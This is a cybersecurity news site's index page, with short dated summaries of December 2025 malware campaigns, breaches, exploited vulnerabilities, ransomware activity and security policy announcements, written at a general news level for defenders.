Site Map

Comprehensive index of all cybersecurity intelligence content and resources.

Security Articles

"GhostPoster" Malware Infects 50,000+ Firefox Users via Malicious Add-ons

A stealthy malware campaign named "GhostPoster" has infected over 50,000 Mozilla Firefox users by distributing 17 malicious browser extensions. The add-ons, which masqueraded as legitimate tools like VPNs and ad blockers, have been removed from the Firefox store. The malware employed a clever technique, hiding obfuscated JavaScript within the add-on's logo image file. This code would then contact command-and-control (C2) servers to download a final payload designed for hijacking affiliate links and committing ad fraud. The campaign used evasion techniques like randomized and delayed C2 callbacks to avoid detection.

Dec 18, 20254 min read

"Scripted Sparrow" BEC Group Targets Finance Teams with Highly Structured Attacks

A disciplined and persistent Business Email Compromise (BEC) group, newly identified by Fortra as "Scripted Sparrow," has been systematically targeting corporate finance teams since at least June 2024. The group employs a structured and well-researched approach, sending highly credible phishing emails with fake invoices that impersonate professional services firms. To add legitimacy, the attackers often include forged prior email correspondence from a company executive authorizing the payment. The group utilizes a large network of US-based mule accounts for cashing out, indicating a well-organized and persistent financial threat.

Dec 18, 20254 min read

"IRLeaks" Supply Chain Attack Hits Iranian Banks, Exposing Millions of Customer Records

A major supply chain attack dubbed "IRLeaks" has resulted in a significant data breach affecting several prominent Iranian banks and millions of their customers. Attackers first compromised a third-party IT vendor in October 2025, using it as a pivot point to infiltrate the banks' networks. Over the following month, they exfiltrated vast amounts of financial data and personally identifiable information (PII), including national IDs and bank account numbers, before the breach was discovered in late November. The incident highlights the critical risks associated with third-party vendor security and inadequate patch management.

Dec 18, 20254 min read

Ransomware Evolves: "ClickFix" Social Engineering and Threat Actor Alliances on the Rise

A December 2025 threat report from NCC Group indicates that while ransomware attack volumes plateaued in November with 583 incidents, their sophistication markedly increased. Attackers are increasingly adopting the "ClickFix" (also known as ClearFake) social engineering technique, which tricks users into manually running malicious commands, bypassing many automated defenses. The report also highlights a trend of collaboration, with groups like DragonForce forming alliances with skilled affiliates from other networks. The Qilin ransomware group remained the most prolific actor, with the industrials sector and North America being the most targeted.

Dec 18, 20254 min read

"Operation ForumTroll" APT Targets Russian Academics with Plagiarism Lure

The Advanced Persistent Threat (APT) group known as Operation ForumTroll has launched a new, highly targeted phishing campaign aimed at Russian political scientists and academics. Active since at least 2022, the group's latest attack uses meticulously crafted emails impersonating a major Russian scientific library, eLibrary.ru. The emails lure victims into downloading a supposed plagiarism report, which is a ZIP archive containing a malicious .LNK file. Executing the shortcut file triggers a PowerShell script that downloads and installs the Tuoni command-and-control (C2) framework, giving the attackers remote access for espionage purposes.

Dec 18, 20254 min read

Google Investigates Malicious Code Found in Search Result Infrastructure

Google has launched an urgent investigation after cybersecurity analysts discovered anomalous, encrypted code snippets and obfuscated JavaScript embedded within its core search result payloads on December 17, 2025. The malicious code appears designed to exploit browser sandboxing vulnerabilities, which could potentially enable remote code execution or data theft on users' systems. While Google has not confirmed any user impact and states it is neutralizing the threat, the incident represents a highly sophisticated attack against critical global internet infrastructure, prompting the involvement of government agencies.

Dec 18, 20254 min read

2025: The Year Cybersecurity 'Crossed the AI Rubicon'

According to analysis published on December 14, 2025, the year 2025 represents a fundamental and irreversible turning point for the cybersecurity industry. The widespread integration of Artificial Intelligence (AI) into both offensive and defensive strategies has permanently altered the threat landscape. Key trends include the rise of 'agentic AI' capable of autonomous attacks, adaptive threats that change tactics in real-time, and a surge in highly convincing, AI-generated phishing and deepfake content. While defenders are also adopting AI, the 'great acceleration' in threat complexity is forcing a complete rethink of security playbooks.

Dec 17, 20254 min read

AI Adoption Fuels 'Massive' Cloud Attack Surface Expansion, Palo Alto Networks Report Warns

Palo Alto Networks' 2025 'State of Cloud Security Report' reveals that the rapid adoption of AI is creating an unprecedented expansion of the cloud attack surface. The study, surveying 2,800 security leaders, found that 99% of organizations have had their AI systems attacked in the last year. The use of generative AI in coding is producing insecure code faster than security teams can remediate it, creating a significant risk gap. API attacks have surged by 41% year-over-year, and lenient identity and access management (IAM) remains a top vulnerability. The report calls for a unified, platform-based approach to cloud security to counter AI-weaponized threats.

Dec 17, 20255 min read

French Interior Ministry Confirms Cyberattack Compromised Email Servers

The French Ministry of the Interior has confirmed its email servers were compromised in a cyberattack detected between December 11 and 12, 2025. Interior Minister Laurent Nuñez stated that attackers stole staff email passwords, allowing them to access an unknown number of document files. While the government is still assessing the scale, a hacker group named 'Indra' has claimed, without evidence, to have exfiltrated police files on 16.4 million citizens. In response, the ministry is rolling out two-factor authentication and resetting passwords. The attack on the high-value government target, which oversees national police and security, has raised speculation of nation-state involvement, with groups like APT28 being considered.

Dec 17, 20255 min read

New 'ConsentFix' Phishing Attack Hijacks Microsoft Accounts, Bypassing MFA via Azure CLI Abuse

A novel and sophisticated phishing attack dubbed 'ConsentFix' allows attackers to hijack Microsoft accounts without stealing passwords or bypassing multi-factor authentication (MFA). Discovered by Push Security, the browser-native attack tricks users into completing a fake verification process that involves copying a URL containing a sensitive OAuth authorization code from their browser's address bar and pasting it into the attacker's phishing page. The attacker then uses this code to authenticate as the user via the legitimate and trusted Microsoft Azure Command-Line Interface (CLI). Because the Azure CLI is a first-party app, it bypasses many consent restrictions, granting the attacker full account access. The technique is active and circumvents even phishing-resistant authentication like passkeys.

Dec 17, 20255 min read

New Zealand Launches Massive Public Alert, Warning 26,000 Citizens of Lumma Stealer Malware Infections

In a first-of-its-kind campaign, New Zealand's National Cyber Security Centre (NCSC) is emailing approximately 26,000 people to warn them of potential infection by the Lumma Stealer malware. The potent information-stealing software targets Windows devices to covertly harvest sensitive data, including passwords, browser credentials, banking details, and cryptocurrency wallets. Officials have confirmed that some of the stolen credentials were linked to government and banking systems, heightening the risk of fraud. The NCSC's mass notification directs affected individuals to a government website with instructions for malware removal and improving account security.

Dec 17, 20254 min read

MITRE Extends D3FEND Cybersecurity Framework to Operational Technology (OT)

MITRE has officially extended its D3FEND cybersecurity framework to include Operational Technology (OT), providing a standardized knowledge base of defensive techniques for cyber-physical systems. Announced on December 16, 2025, the NSA-funded initiative aims to create a common language for securing critical infrastructure in sectors like energy, manufacturing, and defense. As OT systems become increasingly connected to IT networks, D3FEND for OT provides a structured ontology of countermeasures tailored to the unique components and risks of industrial environments, mapping defensive techniques to threats against controllers, sensors, and actuators.

Dec 17, 20254 min read

'Operation MoneyMount-ISO' Phishing Campaign Deploys Phantom Stealer via Malicious ISOs

A financially motivated, Russian-language phishing campaign dubbed 'Operation MoneyMount-ISO' is actively targeting finance and accounting departments to deploy the Phantom information-stealing malware. According to researchers at Seqrite Labs, the attack uses emails with fake payment confirmations that contain a malicious ISO disk image file. This technique is designed to bypass email security controls. When the user opens the ISO, it mounts a virtual drive with a disguised executable. Running this file triggers a memory-resident infection chain that deploys Phantom Stealer, which then harvests browser credentials, crypto wallets, and other sensitive data for exfiltration.

Dec 17, 20255 min read

Storm-0249 Evolves: Access Broker Now Deploys Ransomware with Advanced Stealth Tactics

The initial access broker (IAB) known as Storm-0249 is evolving its tactics, moving beyond simply selling network access to actively participating in malware deployment. According to ReliaQuest, the group now uses more sophisticated techniques, including DLL side-loading and fileless PowerShell execution, to facilitate ransomware attacks directly. Their methods involve social engineering victims into running malicious commands (`ClickFix`), which fetch and execute PowerShell scripts from spoofed domains. A key technique is dropping a trojanized version of a SentinelOne security agent DLL to run malware under the guise of a trusted process. This evolution signifies a dangerous trend where IABs are becoming more integrated into the ransomware deployment process, increasing their threat level.

Dec 16, 20256 min read

SoundCloud and Pornhub Confirm User Data Exposure in Separate Breaches, One Via Third-Party

Both SoundCloud and Pornhub have confirmed security incidents exposing user data. SoundCloud suffered a direct breach of an ancillary service dashboard, resulting in the exfiltration of email addresses and public profile information for up to 28 million users (20% of its user base). The company states passwords and financial data were not affected. Separately, Pornhub announced that historical analytics data of some Premium members was exposed due to a breach at its former third-party analytics vendor, Mixpanel. The notorious hacking group ShinyHunters has claimed the Mixpanel breach and is attempting to extort Pornhub, alleging they stole a massive database of user search and watch history.

Dec 16, 20255 min read

CISA Orders Federal Agencies to Patch Actively Exploited Critical GeoServer XXE Flaw

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical XML External Entity (XXE) injection vulnerability in OSGeo GeoServer, CVE-2025-58360, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, which has a CVSS score up to 9.8, allows an unauthenticated remote attacker to read arbitrary files, perform Server-Side Request Forgery (SSRF) attacks, or cause a denial-of-service. Due to evidence of active exploitation, CISA has mandated that all Federal Civilian Executive Branch agencies patch the vulnerability by January 1, 2026. All organizations using the popular open-source geospatial data server are strongly urged to apply the available updates immediately.

Dec 16, 20255 min read

Active Attacks Exploit Critical Fortinet SSO Bypass Flaws to Gain Admin Access

Security firm Arctic Wolf has observed active exploitation of two critical authentication bypass vulnerabilities in Fortinet products, CVE-2025-59718 and CVE-2025-59719. Both flaws, rated 9.1 in severity, allow an unauthenticated attacker to bypass FortiCloud single sign-on (SSO) by forging a SAML message, granting them administrative access to affected devices. The attacks, observed since December 12, 2025, target the default 'admin' account. The vulnerability is present if the FortiCloud SSO feature is enabled, which can be activated automatically when registering a device. Patches are available, and administrators are urged to upgrade immediately or disable the vulnerable SSO feature.

Dec 16, 20256 min read

FreePBX Patches Critical Auth Bypass and RCE Flaws; Update VoIP Platforms Immediately

The popular open-source VoIP platform FreePBX has been updated to fix several serious security vulnerabilities, including a critical authentication bypass (CVE-2025-66039) with a 9.3 CVSS score. This flaw, present in a non-default configuration, allows an attacker to bypass the admin login and potentially achieve remote code execution. Other patched high-severity issues include multiple authenticated SQL injection flaws (CVE-2025-61675) and an arbitrary file upload bug (CVE-2025-61678). These could be chained to upload a web shell and take full control of the server. Administrators are urged to update their FreePBX instances to the latest versions to mitigate these risks.

Dec 16, 20256 min read

New 'PyStoreRAT' Malware Spreads Via Fake OSINT and AI Tools on GitHub

A new malware campaign is distributing an information-stealing Remote Access Trojan (RAT) called 'PyStoreRAT' through fake GitHub repositories. Threat actors create repositories for what appear to be legitimate OSINT, AI, or DeFi tools, artificially inflating their popularity with fake stars and forks. After gaining a user's trust, the attackers push a malicious update containing PyStoreRAT. The malware is designed to evade detection, establish persistence, and steal sensitive data, with a particular focus on cryptocurrency wallets. It can also download secondary payloads like the Rhadamanthys infostealer and propagates via USB drives, posing a significant threat to developers and security researchers.

Dec 16, 20256 min read

700Credit Data Breach Exposes PII of 5.6 Million Individuals

The U.S. fintech company 700Credit, a major provider of credit reports and data services to the automotive industry, has disclosed a data breach affecting at least 5.6 million individuals. The incident, which occurred in October 2025, resulted in an unauthorized actor gaining access to and stealing a significant amount of personally identifiable information (PII). The compromised data includes names, addresses, dates of birth, and Social Security numbers. 700Credit serves approximately 18,000 auto dealerships, and the breach involved data collected between May and October 2025. The company is providing credit monitoring services to affected individuals, and authorities are urging victims to consider credit freezes to prevent identity theft and fraud.

Dec 15, 20256 min read

New 'Gentlemen' Ransomware Group Deploys Advanced GPO and BYOVD Attacks

A new ransomware operation, identifying itself as the "Gentlemen" group, has been observed conducting double-extortion attacks against corporate networks. The group employs sophisticated techniques to achieve its objectives, including the manipulation of Group Policy Objects (GPOs) for wide-scale ransomware deployment across victim networks. Additionally, the threat actor leverages the 'Bring Your Own Vulnerable Driver' (BYOVD) technique to escalate privileges and disable or bypass endpoint security solutions. The emergence of the Gentlemen group highlights the continued evolution in ransomware tactics, combining data theft with advanced defense evasion and lateral movement strategies.

Dec 15, 20256 min read

CVSS 10.0: Atlassian Patches Critical RCE Flaw in Apache Tika Dependency

Atlassian has issued security updates for a critical vulnerability, CVE-2025-66516, in the Apache Tika parser library, a third-party dependency used in many of its products. The flaw, which carries a perfect CVSS score of 10.0, is an XML External Entity (XXE) injection vulnerability. It can be exploited by uploading a specially crafted file, such as a PDF containing a malicious XFA, potentially leading to information disclosure, server-side request forgery (SSRF), or even remote code execution (RCE). The vulnerability affects a wide range of Atlassian's server and data center products, including Jira, Confluence, and Bamboo. Customers are urged to apply the patches immediately.

Dec 15, 20256 min read

xHunt Espionage Group Returns, Targeting Kuwait with New PowerShell Backdoors

The cyber-espionage threat actor known as xHunt has resumed operations with a new campaign targeting organizations in Kuwait. Active since at least 2018, the group is focusing its latest attacks on the shipping, transportation, and government sectors. Researchers have observed xHunt infiltrating networks by targeting Microsoft Exchange and IIS web servers. Once inside, the group deploys a family of custom PowerShell-based backdoors, with tool names like 'Hisoka' and 'Netero' derived from the anime 'Hunter x Hunter'. The campaign's objective appears to be long-term intelligence collection and espionage, leveraging stealthy techniques to maintain persistence.

Dec 15, 20256 min read

New '01flip' Ransomware, Written in Rust, Targets Critical Infrastructure in APAC

A new and stealthy cross-platform ransomware strain named "01flip" has been discovered targeting critical infrastructure organizations in the Asia-Pacific region. The malware is written in the Rust programming language, enabling it to be compiled for both Windows and Linux systems and enhancing its ability to evade detection. Attackers have been observed exploiting exposed services for initial access, then deploying the open-source Sliver command-and-control (C2) framework for reconnaissance and lateral movement before executing the 01flip ransomware. The campaign highlights a growing trend of threat actors using modern, memory-safe languages like Rust to develop more sophisticated and evasive malware.

Dec 15, 20256 min read

LastPass Fined £1.2M by UK Regulator Over 2022 Security Failures

The UK's Information Commissioner's Office (ICO) has fined password manager provider LastPass £1.2 million (approximately $1.6 million) for significant security failures that led to a major data breach in 2022. The regulator found that LastPass failed to implement adequate technical and security measures to protect its users' data. The 2022 incident resulted in a threat actor gaining unauthorized access to a backup database, which contained the data of 1.6 million UK users, including encrypted password vaults. The fine highlights the serious regulatory consequences for security companies that do not meet their data protection obligations.

Dec 15, 20254 min read

India Confirms GPS Spoofing Attacks Targeted Seven Major Airports

The Indian government has officially confirmed that a series of cyber incidents involving GPS spoofing have occurred at seven of the nation's major airports. The attacks, which targeted airports in Delhi, Mumbai, Kolkata, and Bengaluru among others, disrupted navigation data for aircraft utilizing GPS-based landing procedures. Despite the signal manipulation, government officials reported that no flights were canceled or diverted. The successful handling of the incidents was attributed to the implementation of contingency measures and robust safeguards by Air Traffic Control, which allowed for safe operations using alternative navigation aids. The events underscore the growing vulnerability of critical transportation infrastructure to cyberattacks.

Dec 15, 20256 min read

Apple Rushes iOS 26.2 Update to Patch Two Actively Exploited Zero-Days

Apple has released an emergency security update, iOS 26.2 and iPadOS 26.2, to address 26 vulnerabilities. Among these are two critical zero-day flaws, CVE-2025-43529 and CVE-2025-14174, both residing in the WebKit browser engine. The company confirmed reports that these vulnerabilities have been actively exploited in sophisticated, targeted spyware campaigns, potentially allowing attackers to execute arbitrary code on unpatched devices. The update also patches a severe kernel vulnerability, CVE-2025-46285, that could grant an attacker root privileges. All iPhone and iPad users are urged to update their devices immediately.

Dec 14, 20255 min read

CISA KEV Alert: Actively Exploited RCE Flaw in Sierra Wireless Routers

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in Sierra Wireless AirLink routers, CVE-2018-4063, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, which has a CVSS score as high as 9.9, is an unrestricted file upload vulnerability that allows an authenticated attacker to achieve remote code execution (RCE). Due to evidence of active exploitation, CISA has mandated that all Federal Civilian Executive Branch (FCEB) agencies patch the vulnerability by a specified deadline, highlighting the severe risk it poses to network infrastructure.

Dec 14, 20254 min read

Germany Summons Russian Ambassador Over Suspected Air Traffic Control Cyberattack

In a significant diplomatic escalation, the German government has summoned the Russian Ambassador to Berlin following allegations of a cyberattack targeting the nation's air traffic control (ATC) systems. The incident, reported on December 13, 2025, has raised grave concerns about the security of Germany's critical national infrastructure and points towards a potential act of state-sponsored cyber-espionage or disruption. While technical details remain undisclosed, the move underscores the high stakes of cyber hostilities between Western nations and Russia.

Dec 14, 20254 min read

KillSec Ransomware Hits U.S. Financial Firm Daba Finance in Data Extortion Attack

The ransomware group known as KillSec has claimed responsibility for a cyberattack against Daba Finance Inc., a financial services company in the United States. On December 14, 2025, the group listed the company on its data leak site, employing a double-extortion tactic by threatening to release sensitive stolen data if a ransom is not paid. This incident underscores the persistent threat that data extortion gangs pose to the financial sector, which remains a high-value target due to the sensitive customer and corporate information it handles.

Dec 14, 20254 min read

WestJet Data Breach Exposes Info of 1.2 Million Passengers; Scattered Spider Suspected

Canadian airline WestJet has disclosed a significant data breach that occurred in June 2025, impacting approximately 1.2 million passengers. The compromised data includes sensitive personal information such as names, contact details, and travel documentation. While investigations are ongoing, some reports suggest the notorious Scattered Spider hacking group, known for its social engineering prowess, may be behind the attack. The breach poses a serious risk of identity theft and fraud for the affected customers.

Dec 14, 20254 min read

"Catastrophic" Data Breach at Norwegian News Agency NTB Exposes Customer Data

NTB (Norsk Telegrambyrå), Norway's leading news and content provider, has disclosed what it calls a "catastrophic" data breach that occurred in early December 2025. The company announced on December 13 that attackers exploited vulnerabilities in its systems to gain unauthorized access to its customer database, exposing sensitive personal information, detailed customer profiles, and internal communications for thousands of users. NTB is now undertaking a major overhaul of its security infrastructure in response.

Dec 14, 20253 min read

Eswatini Faces Cybersecurity Crisis as Government Fails to Act on Rising Threats

A report published on December 13, 2025, reveals a deepening cybersecurity crisis in the Kingdom of Eswatini. The nation is experiencing a significant increase in cyberattacks targeting citizens, businesses, and government bodies. This surge is compounded by a lack of effective government response, characterized by outdated laws, minimal funding for cybersecurity initiatives, a severe shortage of skilled personnel, and a failure to implement its own national cybersecurity strategy. As a result, the country's digital infrastructure remains highly vulnerable to escalating threats.

Dec 14, 20253 min read

Qilin Ransomware Gang Adds Business Services Firm B Dynamic to Leak Site

The Qilin ransomware group, a prominent ransomware-as-a-service (RaaS) operation, has listed business services company 'B Dynamic' as its latest victim on its dark web data leak site. The December 1, 2025, posting indicates that the company has suffered a network compromise and data exfiltration. By publicizing the breach, the Qilin group is employing its standard double-extortion tactic to pressure the victim into paying a ransom to prevent the public release of stolen data. This incident highlights the persistent threat from established ransomware gangs.

Dec 13, 20255 min read

Stealthy NANOREMOTE Backdoor Abuses Google Drive API for C2 Communications

A new and fully-featured Windows backdoor, dubbed NANOREMOTE, has been discovered by Elastic Security Labs. Written in C++, the malware distinguishes itself by using the Google Drive API for all command-and-control (C2) communications, allowing it to blend in with legitimate cloud traffic and evade traditional network security. The malware, which shares characteristics with the FINALDRAFT implant, is capable of reconnaissance, file transfer, and command execution. This tactic poses a significant challenge for organizations, especially those using Google Workspace, as it makes detecting malicious activity within sanctioned cloud services difficult.

Dec 13, 20255 min read

OpenAI Unveils Strategy to Manage 'High' Risk AI Cybersecurity Threats

OpenAI has announced its strategy for managing the significant cybersecurity risks posed by its increasingly powerful AI models. The company will now treat all future models as potentially 'High' risk under its Preparedness Framework, capable of automating vulnerability discovery and exploitation. Key components of the plan include forming a 'Frontier Risk Council' of external experts, creating a tiered, trusted access program for cyber defense tools, and collaborating with industry partners. The move reflects growing concerns over the potential weaponization of AI for malicious cyber operations.

Dec 13, 20253 min read

CISA Updates Cybersecurity Performance Goals for Critical Infrastructure

On December 11, CISA released an updated version of its voluntary Cybersecurity Performance Goals (CPGs), designed to help critical infrastructure operators bolster their defenses. The new version aligns with the latest NIST standards and places a stronger emphasis on governance, accountability, and risk management. The CPGs provide a baseline of measurable cybersecurity actions that organizations, including those in the healthcare sector, can take to protect against common and impactful threats, promoting a more resilient and proactive security posture.

Dec 13, 20253 min read

Makop Ransomware Evolves, Using GuLoader and New Exploits in Attacks on India

A new campaign by the Makop ransomware group is primarily targeting enterprises in India, with additional victims in Brazil and Germany. The attackers continue to use brute-force attacks against exposed RDP services for initial access. Once inside, they now use the GuLoader downloader to deliver secondary payloads like the AgentTesla and FormBook infostealers. For privilege escalation, the group is exploiting vulnerabilities like CVE-2025-7771 in the ThrottleStop driver to gain kernel-level access and disable security products before deploying the final ransomware payload.

Dec 13, 20255 min read

Google Patches Eighth Chrome Zero-Day of 2025 Under Active Attack

Google has released an emergency, out-of-band security update for its Chrome browser, patching its eighth zero-day vulnerability of 2025. The high-severity flaw, tracked as issue 466192044, is confirmed to be actively exploited in the wild. To prevent further abuse, Google has withheld technical details but analysis suggests it may be a buffer overflow in the ANGLE graphics library. All 3.4 billion Chrome users are urged to update their browsers immediately to version 143.0.7499.109 or later.

Dec 13, 20254 min read

Conduent Breach Exposes 10.5M Patients, Ranks as 8th Largest US Healthcare Breach

Business services giant Conduent has disclosed a massive data breach that exposed the personal and medical information of over 10.5 million people, making it the 8th largest healthcare data breach in U.S. history. The breach, which was active for months between October 2024 and January 2025, has already cost the company $25 million in response efforts. The compromised data includes names, Social Security numbers, and health information, leading to multiple class-action lawsuits against the company.

Dec 12, 20255 min read

"Battering RAM": $50 Hardware Attack Cracks Intel and AMD Secure CPU Enclaves

At the Black Hat Europe 2025 conference, researchers from KU Leuven University demonstrated "Battering RAM," a novel hardware attack that completely undermines modern confidential computing technologies. Using a custom-built DDR4 interposer costing just $50, the attack can bypass the memory encryption of secure enclaves like Intel SGX and AMD SEV. This allows an attacker with physical access to read encrypted memory at runtime, extract secret keys, and defeat protections previously thought to be secure against physical threats.

Dec 12, 20255 min read

TriZetto Discloses Year-Long Data Breach Exposing Patient PHI

TriZetto Provider Solutions, a healthcare revenue management company owned by Cognizant, has started notifying clients about a major data breach. An unauthorized party had access to patient data for nearly a full year, from November 2024 until the breach was detected on October 2, 2025. The attackers accessed historical reports containing sensitive Protected Health Information (PHI), including patient names, Social Security numbers, dates of birth, and health insurance details. The cybersecurity firm Mandiant was brought in to investigate the long-running intrusion.

Dec 12, 20255 min read

Ransomware Goes Global, Targeting New Regions and Industries with Weaker Defenses

Ransomware is becoming a more globalized and unpredictable threat, according to the H2 2025 Global Threat Briefing from cyber analytics firm CyberCube. The report warns that ransomware groups are actively expanding into new geographic regions and industry sectors that have historically seen fewer attacks, often targeting those with less mature cyber defenses. The highly active LockBit ransomware-as-a-service (RaaS) group is a key driver of this trend. The findings suggest that traditional risk models based on geography or industry are becoming less reliable predictors of attack likelihood.

Dec 12, 20255 min read

NATO Sharpens Cyber Defenses in Massive "Cyber Coalition" War Game

NATO has successfully concluded its largest annual cyber defense exercise, "Cyber Coalition," in Tallinn, Estonia. The week-long event involved approximately 1,500 military and civilian personnel from 29 NATO members and seven partner nations. Participants collaborated to defend a fictional nation's critical infrastructure against a series of realistic, hybrid cyberattacks, enhancing their collective ability to respond to modern threats.

Dec 11, 20254 min read

Critical Infrastructure at Risk Due to "Deficient" OT Cybersecurity Training

A new report from Australian cybersecurity firm Secolve has exposed significant deficiencies in operational technology (OT) cybersecurity training across critical infrastructure sectors. The survey of senior professionals in industries like energy, manufacturing, and water found that training is often generic, infrequent, or completely ignored. This lack of specialized training is creating a dangerously immature security culture and leaving vital industrial environments unprepared for cyberattacks.

Dec 11, 20254 min read

Hackers Use Animated Lures and Fake Legal Warnings to Spread Malware

HP's latest Threat Insights Report reveals a significant evolution in social engineering tactics, with cybercriminals using highly convincing lures such as professional animations and fake legal warnings to trick users into downloading malware. The report highlights a campaign impersonating the Colombian Prosecutor's Office to deliver PureRAT. It also details the abuse of trusted platforms like Discord for hosting malicious payloads like the Phantom Stealer and notes the rising threat of session cookie hijacking.

Dec 11, 20254 min read

Hamas-Linked APT "Ashen Lepus" Targets Middle East with New "AshTag" Malware

The Hamas-affiliated advanced persistent threat (APT) group known as Ashen Lepus (or WIRTE) is conducting an ongoing espionage campaign targeting governmental and diplomatic entities in the Middle East. Researchers have identified a new, modular .NET malware suite named AshTag being used in these attacks. The campaign marks a significant evolution in the group's sophistication, incorporating enhanced encryption, in-memory payload execution, and the use of legitimate-looking subdomains to evade detection.

Dec 11, 20254 min read

"Operation DupeHike" Espionage Campaign Targets Russian Corporate HR Depts

A highly targeted cyber-espionage campaign, dubbed "Operation DupeHike," has been identified targeting employees in Russian corporations. Attributed to the threat actor cluster UNG0902, the campaign uses convincing social engineering lures, such as decoy documents about employee bonuses, to infiltrate networks. The primary targets are staff in HR, payroll, and administrative departments, with the goal of achieving persistent surveillance and exfiltrating sensitive corporate data.

Dec 11, 20254 min read

Unpatched Zero-Day in Gogs Git Service Actively Exploited to Gain SSH Access

A critical, unpatched zero-day vulnerability in Gogs, a popular self-hosted Git service, is being actively exploited in the wild. Tracked as CVE-2025-8110 with a CVSS score of 8.7, the flaw is a bypass of a previously patched RCE and allows an attacker to overwrite arbitrary files, ultimately leading to SSH access on the server. Researchers at Wiz have identified over 700 compromised instances, with attackers deploying the Supershell C2 framework.

Dec 11, 20254 min read

Fake Leonardo DiCaprio Movie Torrent Used as Bait to Spread Agent Tesla Trojan

Cybercriminals are luring victims with a fake torrent for a new Leonardo DiCaprio movie to distribute the Agent Tesla information-stealing trojan. Security researchers at Bitdefender analyzed the campaign, revealing a complex, multi-stage attack chain that uses a malicious .lnk shortcut, hidden batch commands in subtitle files, and multiple layers of PowerShell to execute the final payload. The malware runs only in memory and establishes persistence through a fake audio diagnostic task, making it highly evasive.

Dec 11, 20254 min read

React2Shell: Critical 10.0 CVSS RCE Flaw in React and Next.js Under Active Exploitation

A critical, unauthenticated remote code execution (RCE) vulnerability, dubbed 'React2Shell' (CVE-2025-55182), has been disclosed in React Server Components, affecting popular frameworks like Next.js. With a maximum CVSS score of 10.0, the flaw allows attackers to compromise servers with a single crafted HTTP request, requiring no user interaction. The vulnerability stems from an unsafe deserialization process in the 'Flight' protocol. Following the public disclosure on December 3, 2025, multiple weaponized proofs-of-concept became available, and active exploitation attempts by threat actors, including China-nexus groups, were observed. CISA has added CVE-2025-55182 to its Known Exploited Vulnerabilities (KEV) catalog, mandating immediate patching for federal agencies and urging all organizations to update affected components.

Dec 10, 20256 min read

Data Disaster: 4.3 Billion Records Leaked from Unprotected MongoDB Instance

One of the largest lead-generation data leaks ever recorded has been discovered by researchers from Cybernews and Bob Diachenko. An unprotected MongoDB instance, left publicly accessible without a password, exposed a staggering 4.3 billion documents, totaling 16.14 terabytes of data. The dataset contains highly detailed and structured professional and corporate intelligence, with much of the information appearing to be scraped from LinkedIn. Exposed data includes names, email addresses, phone numbers, employment history, and LinkedIn profile details. While the database was secured two days after discovery, the unknown duration of its exposure creates a significant risk of this data being used for sophisticated phishing, social engineering, and identity theft campaigns on a massive scale.

Dec 10, 20255 min read

OPSEC Fail: North Korean Spy 'Trevor Greer' Exposed by Own Infostealer Infection

In a major operational security (OPSEC) failure, a North Korean state-sponsored hacker was unmasked after accidentally infecting their own machine with commodity infostealer malware like LummaC2. The leaked logs, analyzed by Flashpoint and Hudson Rock, exposed the digital life of an operative using the persona 'Trevor Greer.' The data revealed fake identities, cryptocurrency ventures, and, most notably, a direct link to the $1.5 billion cryptocurrency heist from the exchange Bybit. The actor had registered a phishing domain, 'Bybit-assessment.com,' prior to the attack. This rare glimpse into an APT operator's personal machine highlights that even sophisticated actors make human errors, providing invaluable intelligence for defenders.

Dec 10, 20255 min read

GrayBravo MaaS Fuels Cybercrime with CastleLoader Malware

The cybercrime ecosystem is becoming more industrialized with the rise of Malware-as-a-Service (MaaS) operations like 'GrayBravo.' According to Recorded Future's Insikt Group, GrayBravo is developing and distributing a sophisticated loader called CastleLoader to at least four separate threat clusters. These clusters then use the loader to deploy various payloads, including RedLine Stealer and NetSupport RAT. The campaigns show specialization, with one group targeting the logistics sector using phishing and social engineering, while another uses Booking.com lures to target the hospitality industry. GrayBravo's operation, which features rapid development and a large infrastructure, exemplifies how MaaS providers empower less-skilled actors to launch effective and widespread attacks.

Dec 10, 20255 min read

DeadLock Ransomware Uses Vulnerable Baidu Driver to Blind EDRs

A new DeadLock ransomware campaign is leveraging a novel "Bring Your Own Vulnerable Driver" (BYOVD) loader to exploit a vulnerability (CVE-2024-51324) in a legitimate Baidu Antivirus driver, `BdApiUtil.sys`. This technique allows the threat actors to terminate any process, including endpoint detection and response (EDR) and antivirus solutions, from the kernel level. By blinding security tools, the attackers can deploy the ransomware unimpeded. The attack chain, analyzed by Cisco Talos, also involves PowerShell scripts to disable Windows Defender and delete volume shadow copies, severely hindering detection and recovery efforts.

Dec 9, 20255 min read

Code-to-Cloud Attacks: Leaked GitHub Tokens Become Keys to the Kingdom

Security researchers at Wiz have detailed an emerging "code-to-cloud" attack vector where threat actors leverage compromised GitHub Personal Access Tokens (PATs) to pivot from code repositories directly into production cloud environments. By abusing the trust between GitHub and connected Cloud Service Providers (CSPs), attackers with even basic read permissions can discover secret names, then use write permissions to execute malicious GitHub Actions that exfiltrate CSP credentials. The attack is particularly stealthy as API calls to search for secret names are not logged by GitHub Enterprise, creating a major visibility gap for defenders.

Dec 9, 20256 min read

New 'Broadside' Botnet Exploits DVRs to Target Maritime Logistics

A new, sophisticated variant of the Mirai botnet, dubbed "Broadside," is actively exploiting a command injection vulnerability (CVE-2024-3721) in TBK Digital Video Recorder (DVR) devices. According to research from Cydome, the campaign specifically targets the maritime logistics sector, where these DVRs are common. Broadside is more advanced than typical Mirai variants, using stealthier techniques and a custom C2 protocol. Crucially, its goals extend beyond DDoS to include credential harvesting and lateral movement, turning compromised DVRs into strategic footholds on vessel networks.

Dec 9, 20256 min read

AI Threat Hunting Exposes 'GhostPenguin,' a Linux Backdoor Undetected for Months

Researchers at Trend Micro have discovered "GhostPenguin," a sophisticated, multi-threaded Linux backdoor written in C++. The malware remained completely undetected on VirusTotal for over four months after its initial submission. It was ultimately found using an AI-driven automated threat hunting pipeline designed to analyze zero-detection samples. GhostPenguin provides attackers with full remote shell access and file system control over an RC5-encrypted UDP channel, using port 53 to masquerade as DNS traffic, highlighting the growing need for AI in detecting emerging, stealthy threats.

Dec 9, 20255 min read

Vishing Attackers Impersonate IT on Teams, Trick Users into Running Fileless Malware

